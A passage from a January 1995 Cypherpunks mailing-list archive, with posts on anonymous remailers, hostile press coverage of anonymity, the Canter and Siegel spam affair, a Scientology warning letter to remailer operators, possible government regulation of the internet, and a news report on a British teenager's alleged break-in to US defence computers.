BL>  I don't see why a debit card couldn't be anonymous

BL> Why should a bank care who you are once they have
BL> your money in the account.

The bank might not care.  The IRS probably does and would insist on
knowing about transfers from bank accounts to anon debit cards.

BL> you don't lose the card how can someone use your account?

Just like with real cash.  Possession is ownership.  Digital cash
involves crypto and, I assume, some type of personal ID?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com
Date: Wed, 4 Jan 95 06:03:44 PST
To: cypherpunks@toad.com
Subject: Re: Press attack on anonymity.
Message-ID: <9501041402.AA07682@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


> From: <koontz@maspar.com>
> 
> Sandy Sandfort posted an editorial from the Mondays SF Chronicle.
> 
> There is a front page story in todays San Jose Mercury News on why
> anonymity is a bad thing.
> 
> Its from a New York Times story by Peter H. Lewis
> 
> The question is who launched all this stuff?

Funny thing is, _I_ just wrote a long piece on anon remailers too, though
it was obviously from a different perspective from Peter Lewis's (and a lot
better written, natch).  The local paper it was written for liked it, but
thought the subject matter was "too technical" for its readership, so I'm
hoping to get it published elsewhere.  When I got the idea, all I could
think of was why no one else had done a piece specifically on remailers.
It's an important story.  I guess everyone else was working on them at the
same time.

I hope that there are some good pro-anonymity pieces published soon to give
some "balance."

P.S.: Martha S. Siegel is absolutely out of her mind.  If she wasn't
lynched after the green card episode, this latest stunt should do it.

   --Dave.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com
Date: Wed, 4 Jan 95 06:18:02 PST
To: cypherpunks@toad.com
Subject: Re: Siegel and Lewis
Message-ID: <9501041417.AA08643@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


> From: <raph@netcom.com>
> 
>    I just got off the phone with Peter Lewis, reporter for the New
> York Times. He is unaware of any grand consipracy to regulate the Net,
> but then again if there was one, I don't think they'd tell him.
> 
>    His piece that ran Saturday was badly mangled by the editorial
> process, especially since it ran on page one. Those articles get to be
> mangled by a whole new set of people who otherwise wouldn't get to
> touch it. I think Lewis has basically good intentions, and does do his
> homework before writing a story.

I have a good friend who writes for the Times.  Last time I spoke to
him, he was frantically trying to get in touch with the Business editor
because a piece he'd just written had been hacked to bits, with several
inaccuracies introduced.  He probably couldn't reach the guy, and I bet
the mutilated version got printed (I don't know for sure, since I don't
read the Times).  This is standard.

It's almost a rule that whenever there's a story on a subject you're
familiar with there'll be major inaccuracies.  So what does that say
about all the others?

>    Yecchh. Now I know why I don't rely on daily newspapers for my news

Well, that's one reason, anyway...

   --Dave.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 4 Jan 95 06:39:58 PST
To: raph@netcom.com (Raph Levien)
Subject: Re: Siegel and Lewis
In-Reply-To: <199501040022.QAA21291@netcom17.netcom.com>
Message-ID: <9501041431.AA14688@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Raph Levien says:
>    I just got off the phone with Peter Lewis, reporter for the New
> York Times. He is unaware of any grand consipracy to regulate the Net,
> but then again if there was one, I don't think they'd tell him.

I doubt that there is one.

>    Martha Siegel is just fucked up enough that she will probably push
> for legislation regulating the nets. Congress is just fucked up that
> they might pass it.

Peter should take some responsibility for perpetuating Mr. Canter and
Ms. Siegel. He failed, in my opinion, to properly reflect the
situation in his articles about it in The Times. In particular, he did
very little to convey that the two are de fact disbarred attorneys who
had played the same games in "real space" that they had in Cyberspace
and had been dragged through the coals by the Florida bar association
for it because to almost anyone what they had been doing was a gross
ethical violation.

He also made it seem as though internet users were opposed to
advertising, when, of course, advertising has been on the net for many
many years, and newsgroups like comp.newprod exist to publish nothing
but ads. He didn't properly convey that the defect in their behavior
had been the jamming of other people's communications with their ads,
rather than the act of advertising per se -- much like someone
standing up during a town meeting on some local matter and starting to
declaim loudly not on the purpose of the meeting but instead about how
great their legal services were.

Peter also did little to interview anyone with substantial standing in
the internet community about what C&S were doing -- a quote or two
from an old net hand like a Gene Spafford or someone of that ilk might
have been valuable. As it was, he didn't produce much to counter the
viewpoint that they were the victims rather than the victimizers.

I think it is only because the "paper of record" published articles
that made them look like their point of view had any merit at all that
they managed to survive this long. As it is, the Tennessee Bar is
looking in to whether they have committed any new ethical
violations. I'd say, of course, that they had...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 4 Jan 95 06:45:31 PST
To: cypherpunks@toad.com
Subject: Re: San Francisco Editorial
In-Reply-To: <199501032244.OAA15281@jobe.shell.portal.com>
Message-ID: <Qj2fAKT0Eyt5BUJxh8@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


A letter to the editor is like spitting into the wind in this case.   I
think what's needed is a more constructive affirmative action, ideally
taking Cantor and Siegel to court somewhere.

I know that there was an FCC ruling in 1993 that has saved me LOADS of
annoyance from telephone sales calls, because now if you get such a call
and you formally request to be taken off their dialing lists, you can
actually SUE them if they call you again.  As a result, they now tend to
take you very seriously when you make such a request in a knowledgable
fashion.  Does anyone know if there might be a similar legal case to be
made against net spammers who persist after being warned?  I suspect
that it's easy to make such a case for email spamming, but probably not
for spamming of umoderated newsgroups.

Note that I speak entirely for myself here, not for my employers.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Octavian  Ureche <tavi@info.polymtl.ca>
Date: Wed, 4 Jan 95 06:41:39 PST
To: cypherpunks@toad.com
Subject: Re: 16 years old hacker arrested ?
Message-ID: <199501041442.AA20561@von-neumann.info.polymtl.ca>
MIME-Version: 1.0
Content-Type: text/plain


> According to AFP(London), The Independent reported on January 3, 1995
> that a sixteen years old boy was arrested for breaking into the 
> computer network of US Defense Department.
> 
> The report also tells that the hacker posted documents about last
> year's nuclear crisis between North Korea and USA.
> 
> Does anyone know where can I get a copy of that documents ?
> 

This is a repost from another list:

---------------------------------------------------------
   
   TEEN-AGE HACKER TAPS INTO U.S. DEFENSE SECRETS 
  
   From wire reports
   
   LONDON - A British teen-ager allegedly hacked into sensitive U.S.
   government computers and was able to monitor secret communications
   over the North Korean nuclear crisis last spring, the Independent
   newspaper reported Tuesday.
   
   The boy tapped into several defense computers for seven months in what
   U.S. officials conceded was one of the most serious breaches of
   computer security in recent years, the paper said.
   
   The 16-year-old, after reading the messages, put them on a bulletin
   board on the Internet, an international computer network accessible to
   35 million users.
   
   A British hacker who read the messages told the Independent they
   contained information about firing sites in North Korea and field
   intelligence.
   
   "He kept detailed logs of communication traffic. He really couldn't
   believe his luck. The Americans thought he was a spy but he told them
   he was just doing it for fun," the hacker told the Independent.
   
   The boy, nicknamed "Datastream" by other Internet users, was finally
   caught by special U.S. investigators because he left his terminal
   on-line to a U.S. defense computer overnight.
   
   British police arrested the boy in July and prosecutors are expected
   to decide this month whether he can be charged, the Independent said.
   
   In a statement to the paper, the U.S. Air Force Office of Special
   Investigations acknowledged the hacker could have accessed and read
   the Korean files.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Dalai Lama <dan@chopin.udel.edu>
Date: Wed, 4 Jan 95 06:59:35 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <9501040637.AA11348@anchor.ho.att.com>
Message-ID: <Pine.SOL.3.91.950104095816.28473A-100000@chopin.udel.edu>
MIME-Version: 1.0
Content-Type: text/plain



I know that in Delaware it is illegal for a merchant to request ID when 
you pay by credit card.  I'm not sure if this is wide spread or just 
local. 

-- [Here's something for those friendly mail scanners...]
hack phreak crack assassinate president virus espionage clinton honduras
root RSA LSD-25 plutonium north korea terrorist encryption die NSA CERT quiche

> The standard merchant contract with Visa/Mastercharge used to forbid
> merchants from asking for additional ID unless they suspected fraud;
> I think some states have made laws about this as well.
> 
> 	Bill
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Wed, 4 Jan 95 07:14:10 PST
To: cypherpunks@toad.com
Subject: Regulatory Risks
Message-ID: <199501041514.AA02778@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


So if the feds intend to regulate cyberspace, what specific sorts of
regulations are possible at this point?

Forget laws, what is *technically* and institutionally feasible?

Can they just throw out TCP/IP and mandate X25?  Can TCP/IP be "tamed?"  How
can they control private virtual networks that piggyback on the basic
network structure?  

Just questions.  No answers.

DCF
*************************************************************************
ATMs, Contracting Out,  Digital Switching, Downsizing, EDI, Fax, Fedex,
Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone 
Cards, Quants, Securitization, Temping, Voice Mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 4 Jan 95 10:38:47 PST
To: "David G. Koontz" <koontz@MasPar.COM>
Subject: Re: Press attack on anonymity.
In-Reply-To: <9501032146.AA19980@argosy.MasPar.COM>
Message-ID: <Pine.3.89.9501041054.A10000-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, David G. Koontz wrote:
> The question is who launched all this stuff?

When the government -- or some rogue government department wishing
to expand its role and authority -- wishes to launch a new,
and possibly unpopular, act of coercion, they normally find
some interest group that might be advantaged by that act
of coercion, and boost them up.

Assume the objective is to make the famous information
superhighway into an imitation of Plodigy and existing
media -- in other words ensure that it is dominated
by few to many communications, and that many to many
communications are censored.

The obvious interest group is those who wish to advertise
on the interent as if it was a normal few to many medium.

This assumption makes predictions consistent with 
what we observe.

I am not unduly worried.   Cantor and Siegal is not 
a significant interest group.  Furthermore the 
Republican party is at present in favor of many to many
communications because talk radio was a big factor
in their victory, and the internet was a major factor
in the defeat of Foley.

This is just a small time conspiracy by some ignorant
rogue government department, perhaps the NSA, that does 
not realize what they are confronting.

When the internet starts to have a serious impact on
government revenues, then I am going to worry.

In addition, many to many communications work primarily
against the Democrats primarily because they are so 
entrenched in power.  When the Republican party has
been in power a while, they will no longer be so
keen on many to many communication.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 4 Jan 95 11:06:45 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Regulatory Risks
In-Reply-To: <199501041514.AA02778@panix.com>
Message-ID: <Pine.3.89.9501041009.A14363-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Jan 1995, Duncan Frissell wrote:

> So if the feds intend to regulate cyberspace, what specific sorts of
> regulations are possible at this point?
> 
> Forget laws, what is *technically* and institutionally feasible?

Criminalize anonymity, and tell the internet providers to figure
out how to enforce it or face confiscation.

After that, they can get involved in the standards business to
ensure that when the current 32 bit internet address space
is upgraded, we go with a system where the technology 
supports centralized administration rather than anarchy.

They can do it -- but they probably will not.  Recent political
events mean that such actions can only be done on presidential
authority.   It will be impossible to obtain new law to enforce
such measures for at least four years.


There will be eventually a big confrontation between governments
and liberty in cyberspace -- but I doubt that this is it.

This one can be won with a few letters to the editor.


 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Wed, 4 Jan 95 11:08:49 PST
To: cypherpunks@toad.com
Subject: Re: Warning letter from Co$. [any comments ?]
In-Reply-To: <199501041600.AA07488@xs1.xs4all.nl>
Message-ID: <199501041907.LAA06127@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> nobody@replay.com (Name withheld on request) writes:
> FROM:  THOMAS M. SMALL
> COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE
> PUBLICATIONS, INC.

While the issue is interesting (using anonymous mailers to violate
copyrights or to expose scams, depending on your view of the content),
the apparent aim of the Scientologists isn't met by approaching the
cypherpunk remailers: the specific anonymous postings have been through
penet so far, I think.

> Recent   proposed   legislation   regarding    potential
> liability   of  systems  operators  and  others  who  provide
> facilities or services, such  as  annonymous  remailers,  for
> information  passing through their systems has understanda> bly
> created concern  on  the  part  of  systems  operators  as  a
> potential  liability.   We  ask  your voluntary assistance in

You missplet "anonymous".  Hope this helps.

The only "proposed legislation" I know of was proposed by Martha Siegel,
the greencard guru from CyberHell.  Any others?

> We  ask that you confirm that you have blocked access to
> these newsgroups through your remailer.  If you are unwilling
> to  do  so,  we  ask that you inform us as to the reasons for
> your position.

Yeah, right.  People unclear on the concept of anonymous remailers.
Maybe they should be talking to the mail-to-news forwarders instead.

	Jim Gillogly
	Highday, 13 Afteryule S.R. 1995, 19:06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 4 Jan 95 11:13:46 PST
To: Cypherpunks@toad.com
Subject: Anonymity and talk.politics.chinal
Message-ID: <Pine.3.89.9501041158.A14363-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


Many of the messages in talk.politics.china are anonymous.

They use anon.penet.fi

Many of these messages are in Chinese, not ASCII.

This is an obvious example of legitimate use of anonymity.

In addition this example makes an association in peoples minds
between suppressing anonymity, and discouraging dissent.




 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Wed, 4 Jan 95 11:38:33 PST
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: San Francisco Editorial
In-Reply-To: <Qj2fAKT0Eyt5BUJxh8@nsb.fv.com>
Message-ID: <Pine.SUN.3.91.950104113626.11567D-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


"A letter to the editor is like spitting into the wind", you say.  

Well, yeah...but with enough spit, the wind may change.  So everyone 
should write letters to the editor....and make copies for your 
congressman while you're at it.  This is absolutely the most effective 
action you can take for 64 cents.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sghahn@math1.kaist.ac.kr (han@joe.math.uga.edu)
Date: Tue, 3 Jan 95 19:15:44 PST
To: cypherpunks@toad.com
Subject: 16 years old hacker arrested ?
Message-ID: <9501040310.AA04088@math1.kaist.ac.kr>
MIME-Version: 1.0
Content-Type: text/plain



According to AFP(London), The Independent reported on January 3, 1995
that a sixteen years old boy was arrested for breaking into the 
computer network of US Defense Department.

The report also tells that the hacker posted documents about last
year's nuclear crisis between North Korea and USA.

Does anyone know where can I get a copy of that documents ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Wed, 4 Jan 95 09:30:06 PST
To: perry@imsi.com
Subject: Re: Siegel and Lewis
Message-ID: <199501041728.AA27110@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



>
>Peter also did little to interview anyone with substantial standing in
>the internet community about what C&S were doing -- a quote or two
>from an old net hand like a Gene Spafford or someone of that ilk might
>have been valuable. As it was, he didn't produce much to counter the
>viewpoint that they were the victims rather than the victimizers.

Geez, thanks. He quoted me in an article on the C&S problem long ago. 
I had a legitimate beef because my service provider dutifully kept
many empty newsgroups around just in case someone discovered them.
C&S did and I literally spent 2 hours unsubscribing from all of them.
I seem to remember that he quoted me as being really inconvenienced,
which is pretty much what happened to everyone else. 
>
>I think it is only because the "paper of record" published articles
>that made them look like their point of view had any merit at all that
>they managed to survive this long. As it is, the Tennessee Bar is
>looking in to whether they have committed any new ethical
>violations. I'd say, of course, that they had...

You are correct, though, about this. They seem to draw much more 
unsuspicious attention then a pair of disbarred attornies should
get. Of course, all attornies deserve caution and suspicion. 
>
>Perry






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 4 Jan 95 09:50:48 PST
To: cypherpunks@toad.com
Subject: Re: Warning letter from Co$. [any comments ?]
Message-ID: <v01510100ab308e357e7d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:00 PM 1/4/95, Name withheld on request wrote:

<A laughable pseudo-legal screed from a church started on a bet in a bar.>

This may be interesting. Practically the entire revenue stream for the
"Church" of "Scientology" comes from "sales" of this "literature".  If
someone publishes it on the internet anonymously, the revenue accounts of
the Co$ may become "Clear". Ahem.

Meanwhile, theology and philosophy departments everywhere are fighting for
funding to put most of the legitimate canon in their fields on the net for
free...

>                                             Thomas M. Small
                                                        ^^^^^
Cheers,
Bob R. Nott
       ^^^^

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 4 Jan 95 13:10:13 PST
To: cypherpunks@toad.com
Subject: who?
Message-ID: <199501042110.NAA27459@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


 does anybody know what the email address is for the good samaritans?

tia

 ps, how come mail i send to jpiunix.com is getting bounced, are they down?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Wed, 4 Jan 95 10:36:29 PST
To: cypherpunks@toad.com
Subject: British Hacker Article
Message-ID: <199501041831.AA22005@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


From The Independent (London) Tuesday 3 January 1995 - Front Page

[Banner Headlines]

BRITISH BOY `RAIDED US DEFENCE SECRETS'

by Tim Kelsey

A 16-year-old Briton allegedly hacked into some of the US government's most
sensitive computers and was able to watch secret communications between US
agents in north Korea during the crisis over nuclear inspection last spring.
After reading them, he put them onto a bulletin board of the Internet, an
international computer network accessible by 35 million users.

_The_Independent_ has learnt that Scotland Yard has arrested the boy and has
sent a report to the Crown Prosecution Service.  Officers expect to be told
whether he can be charged this month.

In what US officials have conceded is one of the most serious breaches of
computer security in recent years, the boy accessed several defence
department systems for at least seven months without detection.  The systems
he obtained access to included those for ballistic weapons research, and
aircraft design, payroll, procurement, personnel records and electronic mail.

The boy, who was arrested in Tottenham, north London in July, was, according
to US officials, one of a number of people who broke into US defence
computers in the latter months of 1993 and the early months of 1994.  But it
is understood that he was responsible for most of the damage.  In all, more
than a million user passwords were compromised.  The US Defence Information
Systems Agency admitted in a private briefing, which has been confirmed,
that the hackers had affected the Department's "military readiness."

The boy was first detected in March 1994, and the Air Force Office of
Special Investigations (OSI) was appointed to investigate.  The OSI is a
special task force, based at Bolling Air Force Base in Washington DC.  It
mounts special "raids" on classified computer sites to test their security.
A spokesman said yesterday that the boy, who was nicknamed "Datastream" by
friends on the Internet, needed "more knowledge than the average home
computer owner would possess" to hack the computers.  It is understood that
he invented a "sniffer" programme which searched across hundreds of
computers attached to the Internet for passwords and user names.  He was
finally caught because he left his terminal on-line to a US defence computer
over night.

Another British hacker, aged 22, who is acquainted with "Datastream", read
some of the messages accessed by him.  "They contained information about
firing sites in North Korea and stuff like that.  Field intelligence.  He
kept detailed logs of communication traffic.  He really couldn't believe his
luck.  The Americans thought he was a spy but he told them he was just doing
it for fun.


The OSI said in a statement:  "It is unknown if any hacker actually read,
copied or took any other action with the Korean files or any other sensitive
data.  The Korean files were on the Girths Air Force Base computer system
and therefore the could have been accessed.  It is our opinion that the
hacker who accessed the Korean file system learned of its existence form a
bulletin board system or another hacker.  It is possible the hacker could
have read the Korean files."

Scotland Yard's Computer Crime Unit is able to prosecute the boy under the
terms of the Computer Misuse Act, which allows for crimes committed overseas
by Britons to be dealt with in UK courts.  A spokesman confirmed that a
report had been sent to the CPS.

The Internet, designed in the 1960s by US Defence engineers to enable them
to communicate quickly by computer, is now available to anyone who pays a
small fee.

---
Keyboarding by Lois Roth

*************************************************************************
ATMs, Contracting Out,  Digital Switching, Downsizing, EDI, Fax, Fedex,
Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone 
Cards, Quants, Securitization, Temping, Voice Mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 4 Jan 95 10:55:56 PST
To: Doug Barnes <db@Tadpole.COM>
Subject: Re: Siegel and Lewis
In-Reply-To: <9501041424.AA25564@tadpole.tadpole.com>
Message-ID: <Pine.SUN.3.91.950104135455.7622A-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Jan 1995, Doug Barnes wrote:

> Date: Wed, 4 Jan 1995 07:42:57 -0600 (CST)
> From: Doug Barnes <db@Tadpole.COM>
> To: Raph Levien <raph@netcom.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Siegel and Lewis
> 
> 
> Why is it that so many cypherpunks like the economist?
> 
> I learned recently that Eric is a big fan. So am I. You're certainly 
> not the first other cypherpunk to mention this. Weird. I mean, it's
> not exactly a radical publication... it just gets its *&#$*#$ facts
> right. Probably this is it.

I am also a fan.

I tend to focus on the subject matter economist prints.  I just find it 
more on target than most if not all of the major U.S. media sources.

> 
> Doug
> 
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Wed, 4 Jan 95 13:59:06 PST
To: nobody@replay.com
Subject: Re:  Warning letter from Co$. [any comments ?]
Message-ID: <9501042201.AA29419@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


Other than the obvious, that elctronic media hasn't been shown
to be covered by intellectual property, and that something that
has been placed in the public domain, rightly or wrongly isn't
confidential ...

Is this a hoax?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Wed, 4 Jan 95 11:41:13 PST
To: frissell@panix.com
Subject: Re:  Regulatory Risks
Message-ID: <9501041905.AA17682@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan asks
> So if the feds intend to regulate cyberspace, what specific sorts of
> regulations are possible at this point?
> Forget laws, what is *technically* and institutionally feasible?
> Can they just throw out TCP/IP and mandate X25?  Can TCP/IP be "tamed?" 
> How can they control private virtual networks that piggyback on the basic
> network structure?  

"Our chief weapon was surprise", and of course Fear, Uncertainty, and Doubt.
The most effective thing they could do would be to deploy a digital
signature system that you _have_ to use to pay your company taxes
or file your individual tax returns on-line, and go from there
to requiring it for other business transactions with the government.
Subsidized servers, of course.  It's worked with Social Security Numbers,
and if they control on-line signatures for business, then they can
control access to the nets for a large fraction of the population.
Along with it, require that banks use the signatures for electronic banking,
which is a bit easier since banks are heavily regulated and the
Federal Reserve would probably be happy to help.
Besides, it gives the Post Office something to do in a post-paper world.

They obviously can't prevent piggyback networks, but they _can_ make
it economically infeasible for medium-large companies to run them.
For instance, declaring internet providers to be common carriers,
and doing a "digital telephony bill" to require them to use
IPng authentication on packets and traceable headers on news and
email systems, with the risk of de-licensing and confiscation
for non-conformists.  It's nice that the largest backbone provider
is now NOT the NSFnet, but a commercial provider (though I'd obviously
prefer AT&T  to Sprint+MCI :-), but they're still the Phone Company,
and could be forced to accept regulation.

Meanwhile, at the user end, the Enemy could start using confiscation
on any computers caught running remailers or encryption -
even if they can't stop us Nasty Evil Black-Marketeering K0deZ Dealers,
they could make it too risky to do at work or school,
which means your own money is on the line if you get caught
calculating in the Black Numbers.  I doubt they'll be able to
ban convicted lawbreakers from using computers entirely
for much longer (heck, I wouldn't be able to use my microwave
oven any more, much less drive my car), but they could still try.

			Bill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 3 Jan 95 19:02:58 PST
To: cypherpunks@toad.com
Subject: Re: Why I have a 512 bit PGP key
In-Reply-To: <9501031809.AA21532@elysion.iaks.ira.uka.de>
Message-ID: <Pine.SUN.3.91.950104140321.7300D-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Hadmut Danisch wrote:

[ On smart compilers ]

> It's enough to recognize DES tables or PGP procedures.

And common benchmarks, such as Eratosthenes' Sieve...

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enki of Enridu <elkinsd@teleport.com>
Date: Wed, 4 Jan 95 14:10:47 PST
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Stegno for Kids
In-Reply-To: <Pine.ULT.3.91.950103140953.24233A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.SUN.3.91.950104140723.886C-100000@linda.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Robert A. Hayden wrote:

> On Tue, 3 Jan 1995, Hadmut Danisch wrote:
> There was also this thing where you would get these books and a magic 
> marker, and they you would do puzzles in the book, and use the pen to 
> develope the answer.
> 
> The old Infocom hint books also used a similiar setup.

I remember those. The hints would range in order of how desperate the 
player was. That was almost as much fun as the game...

David Elkins




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Wed, 4 Jan 95 14:42:04 PST
To: db@Tadpole.COM
Subject: Re: Siegel and Lewis
Message-ID: <9501042243.AA25793@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



Why is it that so many cypherpunks like the economist?

I learned recently that Eric is a big fan. So am I. You're certainly
not the first other cypherpunk to mention this. Weird. I mean, it's
not exactly a radical publication... it just gets its *&#$*#$ facts
right. Probably this is it.
...................................................

I like it for its classy, stylish prose.
And the fact that it presents an economic perspective on world events.

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 4 Jan 95 14:47:32 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: Siegel and Lewis
In-Reply-To: <ab30c81703021004a6f1@[132.162.201.201]>
Message-ID: <Pine.3.89.9501041410.A15563-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Jan 1995, Jonathan Rochkind wrote:
> In a rather disjointed sort of way, that makes it easy to beleive the
> article was mangled somewhat in editing. Perhaps they rearanged it to put
> the "sensational" fear-mongering stuff first.  Which is unfortunate, and

One of the top points was "experts say ....".   Journalists 
do not quote anonymous "experts" on controversial stuff 
unless they have marching orders from above.  It is a 
violation of the standard rules of journalism.  You are 
always supposed to identify the person allegedly speaking.   

"Experts say .." is like "Highly placed sources ...".   You know an 
official lie issued by the the appropriate department of lies is
about going to follow when you see those words.

This article was no accident of sloppy thinking and editing.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Wed, 4 Jan 95 13:45:48 PST
To: cypherpunks@toad.com
Subject: Re: warning letter from...
Message-ID: <m0rPdWs-0004IOC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


Speaking of Scientology...

Forwarded message:
> Newsgroups: rec.humor.funny
> Subject: Do we face Mount St. Helens twice a day?
> From: wb8foz@netcom.com (David Lesher)
> Keywords: topical, funny, parody, computers
> Approved: funny@clarinet.com
> Message-ID: <S7ae.2a78@clarinet.com>
> Date: Wed, 4 Jan 95 12:20:02 EST
> 
> AP:	BILL TAKES ON ORAL & JIM
> 	
> 	Bill Gates, Incorporated announced that the Corporation has
> 	purchased a controlling interest in the Church of Scientology,
> 	effective today. The amount of the transaction was not
> 	disclosed.
> 
> 	A corporate spokesman reading from a prepared text called
> 	"premature" reports that the next version of the company's
> 	mainstay product, referred to as "Windows_2001" in the trade
> 	press, will incorporate an E-meter pop-up box.
> 
> 	The spokesman did vehemently deny that BGI had really intended
> 	to purchase the Roman Catholic Church, but had drafted the
> 	contract with Microsoft Word on a Pentium, thus causing the
> 	error.
> 
> 	"We got what we wanted. We see a great potential in the
> 	Church's auditing techniques, and plan to use them to
> 	investigate methods of producing more uniform structured
> 	thoughts, err, code."
> 
> 	BGI is privately held.
> 	RCC stock closed down 1/8, in light trading.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager

Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

"What's the use of distant travel if only to discover - you're homeless in
your heart."  --Basia, "Yearning"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bshantz@spry.com
Date: Wed, 4 Jan 95 14:48:48 PST
To: cypherpunks@toad.com
Subject: The Good Times virus ...
Message-ID: <199501042250.OAA01990@homer.spry.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey folks,
	Remember the AOL Good Times virus?  Well, we just got some mail here 
at SPRY warning us about it.  I laughed rather hard.  Anyway, I told the guy 
